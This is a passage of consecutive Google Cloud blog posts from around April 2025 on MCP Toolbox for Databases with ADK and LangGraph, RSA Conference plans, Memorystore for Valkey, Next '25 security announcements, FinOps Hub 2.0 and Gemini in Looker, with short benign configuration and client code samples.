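    project: my-project
    region: us-central1
    instance: my-instance
    database: hotels_db
    user: ${DB_USER}
    password: ${DB_PASSWORD}

tools:
  search-hotels-by-name:
    kind: postgres-sql
    source: my-pg-source
    description: Search for hotels by name.
    parameters:
      - name: name
        type: string
        description: Part of the hotel name to match.
    statement: SELECT * FROM hotels WHERE name ILIKE '%' || $1 || '%';
```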
MCP Toolbox for Databases supports Agent Development Kit (ADK)
At Next, we launched the Agent Development Kit (ADK), an open-source framework that simplifies the process of building sophisticated multi-agent systems while maintaining precise control over agent behavior. With ADK, you can build an AI agent in under 100 lines of intuitive code. ADK lets you:
Shape how your agents think, reason, and collaborate through deterministic guardrails and orchestration controls.
Interact with your agents in human-like conversations with ADK’s unique bidirectional audio and video streaming capabilities, enabled with just a few lines of code. Check out the demo of an interactive agent built on ADK from the opening keynote at Google Cloud Next 25 here.
Choose the model or deployment that works best for your needs. ADK works with your stack of choice – whether that’s your preferred top-tier model, deployment target, or integration with remote agents built on other frameworks. ADK also supports the Model Context Protocol (MCP), enabling secure, two-way connections between your data sources and AI agents.
Deploy to production using the direct integration to Vertex AI Agent Engine. This clear and reliable path from development to enterprise-grade deployment eliminates the typical overhead associated with moving agents into production.
Diagram showing Toolbox with support for ADK and connecting to databases
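As a minimal sketch of how the pieces fit together (package and class names reflect the ADK and Toolbox documentation at the time of writing; the URL, toolset, and agent names are placeholders):

```python
# Hedged sketch; verify names against the current ADK and Toolbox releases.
from google.adk.agents import Agent
from toolbox_core import ToolboxSyncClient

# Load database tools served by a running MCP Toolbox instance.
toolbox = ToolboxSyncClient("http://127.0.0.1:5000")  # placeholder URL
tools = toolbox.load_toolset("my-toolset")            # placeholder toolset name

root_agent = Agent(
    name="hotel_agent",
    model="gemini-2.0-flash",
    instruction="Help users search, book, and cancel hotels using the tools.",
    tools=tools,
)
```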
To get started, go to Vertex AI Agent Garden to explore a curated set of agent samples for common use cases like data science and customer service agents. Discover tools that can be easily used to build agents with ADK such as connecting agents to databases with the integrated MCP Toolbox for Databases. You can access source code in GitHub samples that you can clone and start using to develop your own agents.
Adding LangGraph support
LangGraph gives you essential built-in support for a persistence layer, implemented through checkpointers. This helps you build resilient, stateful agents that can reliably manage long-running tasks or resume after interruptions.
To leverage powerful managed databases for storing this state, Google Cloud offers dedicated integration libraries. Developers can choose the following:
The highly scalable AlloyDB for PostgreSQL using the AlloyDBSaver class from the langchain-google-alloydb-pg-python library, or opt for
Cloud SQL for PostgreSQL utilizing the corresponding checkpointer implementation, PostgresSaver, within the langchain-google-cloud-sql-pg-python library.
Both offer robust mechanisms to seamlessly save and load agent execution states, allowing workflows to be reliably paused, resumed, and audited, backed by the manageability and performance of Google Cloud’s PostgreSQL offerings.
When you compile a graph with a checkpointer, the checkpointer saves a checkpoint of the graph state at every super-step. Those checkpoints are saved to a thread, which can be accessed after graph execution. Because threads allow access to the graph’s state after execution, several powerful capabilities are possible, including human-in-the-loop review, memory, time travel, and fault tolerance.
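A minimal sketch of this flow, using the AlloyDB library named above (the `AlloyDBSaver` factory shown here is an assumption; check the `langchain-google-alloydb-pg` documentation for exact signatures):

```python
# Hedged sketch; verify factory names against the package docs.
from langchain_google_alloydb_pg import AlloyDBEngine, AlloyDBSaver
from langgraph.graph import StateGraph, MessagesState, START

engine = AlloyDBEngine.from_instance(
    project_id="my-project", region="us-central1",
    cluster="my-cluster", instance="my-instance", database="my_db",
)
checkpointer = AlloyDBSaver.create_sync(engine)  # persists each super-step

def respond(state: MessagesState):
    # A real node would call a model here; this is a stub.
    return {"messages": [("ai", "hello")]}

builder = StateGraph(MessagesState)
builder.add_node("respond", respond)
builder.add_edge(START, "respond")
graph = builder.compile(checkpointer=checkpointer)

# The thread_id keys a resumable, auditable execution history.
config = {"configurable": {"thread_id": "session-42"}}
graph.invoke({"messages": [("user", "hi")]}, config)
```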
Learn more about LangGraph checkpoint usage for AlloyDB here and Cloud SQL for PostgreSQL here.
Get started
This Colab demonstrates a complete workflow for building and deploying a LangGraph Hotel Agent which can search, book and cancel hotels. This sample shows how to build and deploy an agent (model, tools, and reasoning) using the Vertex AI SDK and MCP Toolbox for Databases.
The demonstration begins with agent development, integrating the MCP Toolbox for Databases to search, book, and cancel hotels. It then walks you through deploying the agent to Agent Engine and the MCP Toolbox to Cloud Run, and concludes by demonstrating how to connect these services remotely.
Here are some more resources to get started with Toolbox and MCP.
Gaining comprehensive visibility into threats across your entire digital landscape is paramount for security teams. We’re excited to bring our capabilities, products, and expertise to the upcoming RSA Conference in San Francisco, where you can learn more about our latest innovations, and where we’ll be sharing insight from this year’s highly-anticipated M-Trends report.
We now offer a streamlined, effective way to make Google an integral part of your security team with Google Unified Security, announced at Google Cloud Next earlier this month. This converged solution brings together the best of Google — unmatched threat visibility, faster threat detection, continuous virtual red-teaming, the most trusted browser, and Mandiant expertise — supercharged by Google Gemini and running on a planet-scale security fabric.
In addition to exploring Google Unified Security firsthand at the RSA Conference, you can take a deep dive into our newest M-Trends report, showcasing the results of more than 450,000 hours of frontline incident response investigation analysis from 2024.
From connecting with Google’s security experts to witnessing innovative cloud security technology in action, Google Cloud Security is the place to be at the RSA Conference. We’ve got a packed schedule of booth activities, insightful keynotes, deep-dive sessions, and exclusive events you won’t want to miss.
Here’s your guide to everything Google Cloud Security is bringing to RSA Conference 2025.
Meet us at our booth: Dive into demos and test your knowledge
Find the Google Cloud Security team on the show floor at booth #N-6062 in the Moscone Center, North Hall. Here you can:
Meet with our security experts: Engage in one-on-one conversations and discover how making Google a part of your security team can strengthen your defenses with Google Unified Security.
Check out live presentations and 1:1 demos: Experience our latest security innovations firsthand and see how Google Unified Security can address your specific challenges.
Test your knowledge at M-Trends trivia: Put your threat intelligence skills to the test for a chance to win exciting prizes.
Gain insights directly from Google Cloud Security leaders
Beyond speculation: Data-driven insights into AI and cybersecurity
Hear Sandra Joyce, VP, Google Threat Intelligence, assess the real-world and future impacts of AI in cybersecurity. This session cuts through the noise to expose practical applications of AI, drawing on Mandiant’s incident response engagements and analysis of attacker use of Gemini.
Tuesday, April 29 | 10:50 AM | Moscone West Keynote Stage
Cybersecurity Year-in-Review and The Future Ahead
Kevin Mandia, one of the industry’s most prominent and respected voices, will present his annual report on the cyber landscape, including the evolving CISO role, the emergence of AI, and the need for resilience. He’ll be joined by former New York Times cyber reporter Nicole Perlroth to discuss the data and share firsthand stories and actionable strategies to strengthen defenses and prepare for the future.
Wednesday, Apr 30 | 9:40 AM – 10:30 AM PDT | Moscone South Keynote Stage
Explore expert-led sessions
We have an exciting lineup of Google Cloud Security speakers who will be presenting at RSAC this year — on the mainstage, in track sessions, and at our Google Cloud Security hub in the Marriott Marquis. Below are the highlights of our Google-led sessions from RSAC, and see our website for a complete list.
Speakers: Anton Chuvakin, Senior Staff Security Advisor, Google Cloud; Michael Bernhardt, Director for Information Security, DATEV; John Dickson, CEO, Bytewhisper Security; Diana Kelley, CISO, Protect AI
Speaker: Daniel Fabian, Principal Digital Arsonist, Google
Wednesday, Apr 30 | 8:30 AM – 9:20 AM PDT
Visit the Google Cloud Security Hub for exclusive events
Join us at the Marriott Marquis for exclusive sessions and networking opportunities at the Google Cloud Security Hub. Register now to secure your spot:
Executive breakfast | Modern cyber defense: Building resilient organizations in a complex world: Join us for an exclusive breakfast briefing where we’ll address the unprecedented challenges facing modern cyber defense. This session will explore the critical role of information sharing and AI in Google Unified Security, and how it helps build more robust and resilient organizations in today’s increasingly complex world.
Tuesday, April 29 | 8:00 AM | Marriott Marquis – Google Cloud Security Hub
Threat Intelligence briefing and luncheon: Learn the latest frontline intelligence over lunch with Google Threat Intelligence Group VP, Sandra Joyce and Chief Analyst, John Hultquist. Don’t miss this exclusive threat overview, where they’ll share observations and analysis of the current threat landscape and how to build a resilient cybersecurity program.
Tuesday, April 29 | 12:00 PM – 1:15 PM | Marriott Marquis – Google Cloud Security Hub
Unwind and connect at our Customer Lounge
During the week, relax and connect with Google Cloud Security experts and partners at the Marriott Marquis for breakfast, lunch, snacks, coffee, and boba. Participate in additional Google Cloud Security sessions, play games, and get a new headshot while networking with other security professionals.
Join us in the space for the return of Tasting Tuesday and Wine Down Wednesday (both starting at 5:30 PM), brought to you in collaboration with Google Cloud Security partners.
Tasting Tuesday: A Delicious Start to RSAC: Enjoy a vibrant atmosphere, eat San Francisco-inspired cuisine, listen to great live music while connecting with industry peers, and savor the start of a successful conference.
Wine Down Wednesday: Celebrate Success: Join us for the ultimate RSAC closing event. Enjoy pairings of great wine and food and live music, and raise a glass to new connections and a successful week of achievements.
Meet you there
RSA Conference 2025 promises to be an insightful week, and Google Cloud Security is ready to contribute valuable knowledge and innovative solutions. We encourage you to make the most of your time by visiting our booth, attending our sessions, re-energizing at the Google Cloud Security Hub in the Marriott Marquis, and connecting with our team.
We’re eager to discuss your security challenges and demonstrate how Google can be your strategic security partner in the face of evolving threats. If you can’t join us in person, we encourage you to stream the RSA Conference sessions here to stay one step ahead of threats.
Editor’s note: Ping Xie is a Valkey maintainer on the Valkey Technical Steering Committee (TSC).
Memorystore, Google Cloud’s fully managed in-memory service for Valkey, Redis, and Memcached, plays an increasingly important role in our customers’ deployments — in fact, over 90% of the top 100 Google Cloud customers use Memorystore. Today, we’re excited to announce that the Memorystore for Valkey service is now generally available, a significant step forward for open-source in-memory data management in the cloud. With GA, you can now run your production workloads on Memorystore for Valkey backed by a 99.99% availability SLA, along with features such as Private Service Connect, multi-VPC access, cross-region replication, persistence, and many more.
When we launched the preview of Memorystore for Valkey in August 2024, hundreds of Google Cloud customers like Major League Baseball (MLB) and Bandai Namco Studios Inc. jumped in and deployed the service. In the last few months, they’ve provided us with invaluable feedback that has shaped the service we’re announcing today:
“At Major League Baseball, our use of Memorystore has been a key part in optimizing how we bring data to our fans. We are excited about the general availability of Memorystore for Valkey, a truly open-source alternative. We believe its inherent flexibility and the power of community-driven development will further enhance our speed, scalability, and real-time data processing capabilities, allowing us to better serve our fans, players, and operations.” – Rob Engel, Vice President of Software Engineering, Major League Baseball
“Bandai Namco Studios uses Memorystore to power the low-latency and high-scale performance essential for many of our titles. We’re excited about the GA launch of Memorystore for Valkey. Its speed, features, and truly open-source nature will empower us to enhance real-time gameplay and scale for our global player base. We look forward to leveraging Memorystore for Valkey’s capabilities to continue pushing the boundaries of gaming innovation.” – Motoo Fukuda, Technical Director at Bandai Namco Studios Inc.
What’s new at GA
At GA, Memorystore for Valkey is backed by a 99.99% SLA powered by Google’s advanced high availability and zonal placement algorithms, and ships with a comprehensive suite of enterprise-grade features such as:
Support for Private Service Connect: Memorystore for Valkey is built on top of Private Service Connect, which allows customers to connect to up to 250 shards using just two IP addresses. Memorystore’s highly available discovery endpoint ensures there is no single point of failure for your cluster.
Zero-downtime scaling: Memorystore for Valkey offers zero downtime scaling (in and out) so your cluster can grow with your application’s needs, and so it’s cost-optimized for your workloads. It supports cluster sizes ranging from 1 to 250 nodes.
Integrated Google-built vector similarity search: Memorystore for Valkey supports ultra-low latency, in-memory vector search, and can perform vector search at single-digit millisecond latency on over a billion vectors, with greater than 99% recall.
This performance is powered by Google’s vector search module, the official search module for the Valkey OSS project, which is integrated into Memorystore for Valkey. The module enables modern AI applications for gen AI use cases such as retrieval-augmented generation (RAG), recommendation systems, and semantic search. With hybrid search support, users can achieve more accurate and contextually relevant search results, leading to improved application performance and a better user experience.
Managed backups: Access to built-in managed backups enables both automated and on-demand backups for migrations, disaster recovery, and compliance.
Cross-region replication (CRR): Using CRR, you can achieve disaster recovery preparedness and low-latency reads across regions. In addition to the primary region, we currently support up to two secondary regions, with clusters that in turn can have varying numbers of replicas. Memorystore for Valkey ensures both the data plane and control plane remain in sync across regions.
Multi-VPC access: Memorystore for Valkey lets clients in multiple VPCs connect to a single Private Service Connect endpoint on the Valkey cluster, so you can securely connect clients across multiple projects and VPCs.
Persistence: Memorystore for Valkey offers both RDB-snapshot and AOF-logging based persistence to meet varying data durability requirements.
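To make the Private Service Connect item above concrete, here is a minimal connection sketch in Python. It assumes the open-source valkey-py client (any Redis OSS 7.2-compatible cluster client works similarly), and the discovery endpoint address is a placeholder for the one shown for your cluster.

```python
# Minimal sketch: connect to a Memorystore for Valkey cluster through its
# Private Service Connect discovery endpoint. The address is a placeholder;
# use the endpoint listed for your cluster.
# pip install valkey
from valkey.cluster import ValkeyCluster

# The cluster client bootstraps from the discovery endpoint and discovers
# the full shard topology from there, which is how two PSC IP addresses
# can front a cluster of up to 250 shards.
client = ValkeyCluster(host="10.128.0.5", port=6379)

client.set("greeting", "hello from Valkey")
print(client.get("greeting"))  # b'hello from Valkey'
```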
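Similarly, here is a sketch of a vector search round trip as described above. It assumes the integrated search module exposes the RediSearch-style FT.CREATE and FT.SEARCH commands; the index name, field names, and 128-dimension embeddings are all illustrative.

```python
# Minimal sketch: build an HNSW vector index and run a KNN query, assuming
# RediSearch-style FT.* commands from the integrated vector search module.
import numpy as np
from valkey.cluster import ValkeyCluster

client = ValkeyCluster(host="10.128.0.5", port=6379)  # placeholder endpoint

# Create an HNSW index over hash keys prefixed "doc:".
client.execute_command(
    "FT.CREATE", "doc_idx", "ON", "HASH", "PREFIX", "1", "doc:",
    "SCHEMA", "embedding", "VECTOR", "HNSW", "6",
    "TYPE", "FLOAT32", "DIM", "128", "DISTANCE_METRIC", "COSINE",
)

# Store one document whose embedding is packed as raw float32 bytes.
client.hset("doc:1", mapping={
    "title": "In-memory databases",
    "embedding": np.random.rand(128).astype(np.float32).tobytes(),
})

# Retrieve the 5 nearest neighbors to a query embedding.
query_vec = np.random.rand(128).astype(np.float32).tobytes()
results = client.execute_command(
    "FT.SEARCH", "doc_idx", "*=>[KNN 5 @embedding $vec]",
    "PARAMS", "2", "vec", query_vec, "DIALECT", "2",
)
print(results)
```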
Memorystore for Valkey supports both Valkey 7.2 and our engine of choice, Valkey 8.0, which offers many enhancements over its predecessor:
Exceptional performance: With asynchronous I/O improvements, Memorystore for Valkey 8.0 delivers better throughput, achieving up to 2x the queries per second (QPS) of Memorystore for Redis Cluster at microsecond latencies and helping applications handle demanding internet-scale workloads with ease.
While priced in line with Memorystore for Redis Cluster, Memorystore for Valkey’s performance optimizations can lead to substantial cost savings by potentially requiring fewer nodes to handle the same workload.
Optimized memory efficiency: Valkey 8.0’s optimized memory management delivers improved memory savings, reducing operational costs across various workloads.
Enhanced reliability: Valkey 8.0 offers significantly more reliable scaling with Google-contributed features like automatic failover for empty shards and highly available migration states. Additionally, we introduced migration-state auto-repairing to further strengthen system resilience.
Memorystore for Valkey also provides other capabilities, such as maintenance windows, single-zone clusters, single-shard clusters, and no-cost inter-zone replication.
Our commitment to open source and customer trust
Following licensing updates to Redis OSS by Redis Inc. in March 2024, the open-source community established Valkey OSS as an alternative that’s supported by organizations including Google, Amazon, Snap and others.
We deeply value the trust you place in us. To ensure you continue to have access to powerful, open technology, we launched Memorystore for Valkey on Google Cloud. Unlike Redis, the Valkey OSS project is under the BSD 3-clause license and backed by the Linux Foundation. The momentum behind Valkey has been exhilarating.
In addition to Memorystore for Valkey, we remain committed to supporting and delivering new capabilities for Memorystore for Redis Cluster and Memorystore for Redis. And when Memorystore for Redis customers are ready to adopt Valkey — for its price-performance, reliability, and open-source nature — we offer full migration support. Memorystore for Valkey is fully compatible with Redis OSS 7.2 APIs and your favorite clients, making it easy to switch to open source. Further, you can reuse your Memorystore for Redis and Memorystore for Redis Cluster committed use discounts (CUDs), smoothing the transition.
Try Memorystore for Valkey today
The best way to experience the power of Memorystore for Valkey is to try it out. Get started with the documentation or deploy your first Valkey instance. Don’t let having to self-manage Redis hold you back. Experience the simplicity and speed of Memorystore for Valkey today and see how it can power your applications, so you can focus on what matters: innovating and creating impactful applications for your business!
Welcome to the first Cloud CISO Perspectives for April 2025. Today, Google Cloud Security’s Peter Bailey reviews our top 27 security announcements from Next ‘25.
As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.
– Phil Venables, strategic security advisor, Google Cloud
27 top security announcements at Next ‘25
By Peter Bailey, VP/GM SecOps, Google Cloud Security
We just wrapped our annual Google Cloud Next conference in Las Vegas, where we introduced innovations across AI, app development, infrastructure, data cloud, partners, and more — including security.
From the moment the curtain went up at our opening keynote, we showcased 229 new products, capabilities, and enhancements that highlight our skyrocketing customer momentum and Google Cloud’s commitment to helping transform the way companies work with our AI-optimized platform.
(Be sure to check out the reimagining of the Wizard of Oz at The Sphere, a collaboration between Sphere Entertainment, Google DeepMind, Google Cloud, Hollywood production company Magnopus, and five others.)
For the first time this year, we also hosted CISO Connect at Next, a unique opportunity for security and business leaders to delve into the ever-evolving cybersecurity landscape with Google experts, covering current threats, breach mitigation strategies, and the transformative potential of AI in fortifying your organization’s security posture.
“We are all solving for the same security challenges; CISO Connect offers a safe environment to collaborate and share, unlike any other conference,” said Mike Orosz, CISO, Vertiv.
We also focused heavily on innovations across our security portfolio, designed to deliver stronger security outcomes and enable every organization to make Google a part of their security team. Fresh from Next ‘25, here are our top 27 security announcements.
Google Unified Security brings together our visibility, threat detection, AI-powered security operations, continuous virtual red-teaming, the most trusted enterprise browser, and Mandiant expertise — in one converged security solution running on a planet-scale data fabric.
The alert triage agent in Google Security Operations will perform dynamic investigations on behalf of users. Expected to preview for select customers in Q2 2025, it analyzes the context of each alert, gathers relevant information, and renders a verdict on the alert, along with a history of the agent’s evidence and decision making.
The malware analysis agent in Google Threat Intelligence will investigate whether code is safe or harmful. Expected to preview for select customers in Q2 2025, it builds on Code Insight to analyze potentially malicious code, including the ability to create and execute scripts for deobfuscation.
Google Security Operations
New data pipeline management capabilities, now generally available, can help customers better manage scale, reduce costs, and satisfy compliance mandates.
The new Mandiant Threat Defense service, now generally available, provides comprehensive active threat detection, hunting, and response. Mandiant experts work alongside customer security teams, using AI-assisted threat hunting techniques to identify and respond to threats, conduct investigations, and scale response through security operations SOAR playbooks, effectively extending customer security teams.
Security Command Center
Model Armor is now integrated directly with Vertex AI. As part of our recently-announced AI Protection capabilities that can help manage risk across the AI lifecycle, developers can automatically route prompts and responses for protection without any changes to applications.
New Data Security Posture Management (DSPM) capabilities, coming to preview in June, can enable discovery, security, governance, and monitoring of sensitive data including AI training data. DSPM can help discover and classify sensitive data, apply data security and compliance controls, monitor for violations, and enforce access, flow, retention, and protection directly in Google Cloud data analytics and AI products.
A new Compliance Manager, launching in preview at the end of June, will combine policy definition, control configuration, enforcement, monitoring, and audit into a unified workflow. It builds on the configuration of infrastructure controls delivered using Assured Workloads, providing Google Cloud customers with an end-to-end view of their compliance state, making it easier to monitor, report, and prove compliance to auditors with Audit Manager.
Integration with Snyk’s developer security platform, in preview, to help teams find and fix software vulnerabilities faster.
New Security Risk dashboards for Google Compute Engine and Google Kubernetes Engine. Now generally available, they can deliver insights into top security findings, vulnerabilities, and open issues directly in the product consoles.
An expanded Risk Protection Program, with new program partners Beazley and Chubb, two of the world’s largest cyber-insurers. They will provide discounted cyber-insurance coverage based on cloud security posture.
Chrome Enterprise Premium
New employee phishing protections use Google Safe Browsing data to help protect employees against lookalike sites and portals attempting to capture credentials.
Data masking in Chrome Enterprise Premium is now generally available.
We are also extending key enterprise browsing protections to Android, including copy-and-paste controls and URL filtering.
Mandiant Cybersecurity Consulting
The Mandiant Retainer provides on-demand access to Mandiant experts. Customers now can redeem prepaid funds for investigations, education, and intelligence to boost their expertise and resilience.
Mandiant Consulting is partnering with Rubrik and Cohesity to create a solution to minimize downtime and recovery costs after a cyberattack. As part of the program, our partners provide affirmative AI insurance coverage, exclusively for Google Cloud customers and workloads. Chubb will also offer coverage for risks resulting from quantum exploits, proactively helping to address the risk of quantum computing attacks.
Sovereign Cloud
We’ve partnered with Thales to launch the S3NS Trusted Cloud, now in preview, designed to meet France’s highest level of cloud certification. As part of our broad portfolio of sovereign cloud solutions, it is the first sovereign cloud offering based on the Google Cloud platform that is operated, majority-owned, and fully controlled by a European organization.
Identity and Access Management
Unified access policies, coming to preview in Q2, create a single definition for IAM allow and IAM deny policies, enabling you to apply fine-grained access controls more consistently.
We’re also expanding our Confidential Computing offerings. Confidential GKE Nodes with AMD SEV-SNP and Intel TDX will be generally available in Q2, requiring no code changes to secure your standard GKE workloads. Confidential GKE Nodes with NVIDIA H100 GPUs on the A3 machine series will be in preview in Q2, offering confidential GPU computing without code modifications.
Single-tenant Cloud Hardware Security Module (HSM), now in preview, provides dedicated, isolated HSM clusters managed by Google Cloud, while granting customers full administrative control.
Network security
Network Security Integration allows enterprises to easily insert third-party network appliances and service deployments to protect Google Cloud workloads without altering routing policies or network architecture. Out-of-band integrations with ecosystem partners are generally available now, while in-band integrations are available in preview.
DNS Armor, powered by Infoblox Threat Defense, coming to preview later this year, uses multi-sourced threat intelligence and powerful AI/ML capabilities to detect DNS-based threats.
Cloud Armor Enterprise now includes hierarchical policies for centralized control and automatic protection of new projects, available in preview.
Cloud NGFW Enterprise supports L7 domain filtering capabilities to monitor and restrict egress web traffic to only approved destinations, coming to preview later this year.
Secure Web Proxy (SWP) now includes inline network data loss protection capabilities through integrations with Google’s Sensitive Data Protection and Symantec DLP using service extensions, available in preview.
To learn more about how your organization can benefit from our announcements at Next ‘25, check out our CISO Insights Hub, and stay tuned for our announcements later this month at the RSA Conference in San Francisco.
In case you missed it
Here are the latest updates, products, services, and resources from our security teams so far this month:
Demystifying AI security: How to use SAIF in the real world: Our new paper, “SAIF in the real world,” takes a deep look at how to apply Google’s Secure AI Framework (SAIF) throughout the AI development lifecycle. Read more.
Shadow AI strikes back: Following our previous spotlight on shadow AI, we look at a new, more insidious form of shadow AI — emerging from within organizations themselves. Read more.
Google announces Sec-Gemini v1, a new experimental cybersecurity model: Sec-Gemini v1 is our new experimental AI model focused on advancing cybersecurity AI frontiers. It can power security operations workflows with state-of-the-art reasoning capabilities and extensive, current cybersecurity knowledge. Read more.
Building sovereign AI solutions with Google Cloud: The world has changed a lot since we first spoke about the options for data residency, operational transparency, and privacy controls in Google Cloud. Organizations are increasingly seeking AI solutions that drive innovation while complying with regional regulations. Here’s how Cloud Run can help. Read more.
Detecting IngressNightmare without the nightmare: To help detect the IngressNightmare vulnerability chain affecting Kubernetes Ingress Nginx Controllers, discovered by Wiz, we’ve developed a novel non-intrusive technique. Read more.
Please visit the Google Cloud blog for more security stories published this month.
Threat Intelligence news
DPRK IT workers expanding in scope and scale: Google Threat Intelligence Group (GTIG) has identified an increase in active North Korean IT worker operations in Europe, confirming the threat’s expansion beyond the United States. This growth is coupled with evolving tactics, such as intensified extortion campaigns and a move to conduct operations in corporate virtualized infrastructure. Read more.
Suspected China-nexus threat actor actively exploiting critical Ivanti Connect Secure vulnerability: Ivanti disclosed a critical security vulnerability impacting many Ivanti Connect Secure VPN appliances on April 3. GTIG has linked UNC5221, a suspected China-nexus espionage actor, to some of the exploits of the vulnerability. Read more.
Windows RDP, going from remote to rogue: GTIG observed a novel phishing campaign in October 2024 that targeted European government and military organizations. Unlike typical remote desktop protocol (RDP) attacks focused on interactive sessions, this campaign creatively used resource redirection and malicious remote apps, including an RDP proxy tool, to automate malicious activities. The campaign likely enabled attackers to read victim drives, steal files, capture clipboard data (including passwords), and obtain victim environment variables. Read more.
Please visit the Google Cloud blog for more threat intelligence stories published this month.
Now hear this: Podcasts from Google Cloud
Decoding cyber-risk and threat actors in Asia-Pacific: From big-picture views to nuanced details only an expert could know, Steve Ledzian, APAC CTO, Mandiant at Google Cloud, shares his insight and knowledge with hosts Anton Chuvakin and Tim Peacock. Listen here.
The state of IAM, from cloud to AI: Henrique Teixeira, senior vice-president of strategy, Saviynt, explores with hosts Anton and Tim how identity and access management has evolved from the beginning of the cloud era through to today’s AI sea change. Listen here.
What not to do when red teaming AI: From uncovering surprises to facing new threats and exposing the same old mistakes, Alex Polyakov, CEO, Adversa AI, discusses how and why his company focuses on red teaming AI systems. Listen here.
Behind the Binary: Inside the mind of a binary ninja: Jordan Wiens, developer of the widely-used Binary Ninja and cofounder of Vector 35, brings his expertise as an avid CTF player to a discussion about the complexities of building a commercial reverse engineering platform. Listen here.
To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in a few weeks with more security-related updates from Google Cloud.
Spring is a great reminder to spring clean – an annual tradition that should extend not only to your household, but also to your virtual cloud infrastructure. Why not start with Google Cloud’s FinOps Hub?
As Google Cloud customers have adopted FinOps Hub to guide their optimization initiatives, we’ve been getting additional feedback from our business community. For example, while DevOps users have access to tools and utilization metrics to identify waste, business teams often lack clear insights into resource consumption, leading to a significant blind spot. The most recent State of FinOps 2025 Report reinforces this need, ranking workload optimization and waste reduction as the top FinOps concern. It’s extremely difficult to optimize workloads or applications if you cannot fully understand how much of a resource is even being used. Why purchase a committed use discount for compute cores that you might not be fully using?
Sometimes the easiest optimizations our customers can make are simply using the resources they are already paying for more efficiently. That’s why, in 2025, we are focused on a deep clean of your optimization opportunities, and have upgraded FinOps Hub to help you find, highlight, and eliminate wasted spend.
1. Find waste: FinOps Hub 2.0 now comes with new utilization insights to zero in on optimization opportunities.
At Google Cloud Next 2025, we introduced FinOps Hub 2.0, focused exclusively on bringing utilization insights about your resources to the forefront, so you can see what potential waste may exist and take action immediately. Waste can come in many forms: a VM that is barely being used at 5% (overprovisioned), a GKE cluster running hot at 110% utilization that might fail (underprovisioned), managed resources like Cloud Run instances that may not be optimally configured (suboptimal configuration), or, worst of all, a VM that may never have been used (idle). FinOps users can now quickly view the most expensive waste category in one easy-to-understand heatmap, by service or AppHub application. But FinOps Hub doesn’t just show you where there may be waste; it also includes more cost optimizations for Kubernetes Engine (GKE), Compute Engine (GCE), Cloud Run, and Cloud SQL to remedy the waste, too.
Waste map showing identified resources with their corresponding utilization metrics
2. Highlight waste: Gemini Cloud Assist supercharges FinOps Hub to summarize optimization insights and send opportunities to engineering.
But perhaps what really makes this a 2.0 release is that we supercharged the most time-consuming tasks on FinOps Hub with Gemini Cloud Assist. Our first launch of Gemini Cloud Assist, which helps create personalized cost reports and synthesize insights, saved our customers more than 100,000 FinOps hours from January 2024 to January 2025. The power of Gemini Cloud Assist to supercharge and automate workflows is a huge benefit, so we applied it to FinOps Hub in two ways. First, FinOps users can now see embedded optimization insights on the hub itself, similar to cost reports, so you don’t need to solve the “needle in the haystack” problem of optimization. Second, you can now use Gemini Cloud Assist to summarize and send top waste insights to your engineering teams so they can take action and remediate fast.
Gemini summary and draft emails with top optimization opportunities
3. Eliminate waste: introducing a new IAM role for your tech solution owners to see and directly act on these optimization opportunities.
Finally, perhaps our most exciting feature – and one long overdue for FinOps – is that we are unlocking access to the Billing console for tech solution owners, so they can get FinOps Hub and Gemini Cloud Assist insights across all their projects in a single pane. For example, if you want to give an entire department that uses only a subset of projects access to FinOps Hub or cost reports, without providing broader billing data access but still letting them see all of their data in a single view, now you can, with multi-project views in the Billing console. Multi-project views are enabled using the new Project Billing Costs Manager IAM role (or related granular permissions). These permissions are currently in private preview, so sign up to get access. Now you can truly extend the power of FinOps tools across your organization with these new access controls.
So use this spring to try FinOps Hub 2.0 with Gemini Cloud Assist and do some spring cleaning on your cloud infrastructure. Because as the saying goes, “With clouds overgrown, like winter’s old grime, Spring clean your servers, save dollars and time.” Well, at least that’s what they say according to Gemini.
Driven by generative AI innovations, the Business Intelligence (BI) landscape is undergoing significant transformation, as businesses look to bring data insights to their organization in new and intuitive ways, lowering traditional barriers that have often kept discoveries out of the hands of the broader organization.
We’re spearheading this trend with Gemini in Looker, which builds on Looker’s history as a cloud-first BI tool underpinned by a semantic layer that aligns data, and changes how users interact with that data: through intelligent BI powered by Google’s latest AI models. The convergence of AI and BI stands to democratize data insights across organizations, moving beyond traditional methods to make data exploration more intuitive and accessible.
Gemini in Looker lowers technical barriers to accessing information, enhances collaboration, and accelerates the process of turning raw data into actionable insights. As we announced at Google Cloud Next 25, we are expanding access to Gemini in Looker, making it available to all Looker platform users. In this post, we discuss its key features, underlying architecture, and transformative potential for both data analysts and business users.
Using AI to enhance productivity and efficiency
We designed Gemini in Looker with a clear objective: to improve productivity for analysts and business users with AI. Gemini in Looker makes it easier to prepare data and semantic models for BI, and simplifies building dashboard visualizations and reports. It also improves business users’ efficiency by strengthening their data literacy and fluency, enabling them to tell data stories in their presentations, and letting them use natural language to go beyond the dashboard and get answers to their questions.
Gemini in Looker does this through a suite of gen-AI-powered capabilities that make analytics tasks and workflows easier:
Looker Conversational Analytics allows users to ask questions about their data in natural language, gaining instant, highly visual answers powered by AI and grounded in Looker’s semantic model. Data exploration is now as simple as chatting with your team’s data expert.
Talk to your data the same way you talk to your data analyst, only faster.
Automatic Slide Generation exports Looker reports to Google Slides, along with AI-generated summaries of charts and their key insights, to automate creating presentations. With Automatic Slide Generation, presentations stay current and relevant: the slides are directly connected to the underlying reports, so the data they present is always up to date.
Rapidly transform your reports into live presentations you can share.
Formula Assistant simplifies the creation of calculated fields for ad-hoc analysis by allowing analysts to describe the desired calculation in natural language. The formula is automatically generated using AI, saving time and effort for analysts and report builders.
LookML Assistant simplifies LookML code creation by letting users describe what they are looking to build in natural language and automatically creating the corresponding LookML measures and dimensions. This helps streamline the process of creating and maintaining governed data.
Advanced Visualization Assistant creates customized data visualizations that users describe in natural language, while Gemini in Looker generates the necessary JSON configuration.
The semantic layer: The foundation of AI accuracy
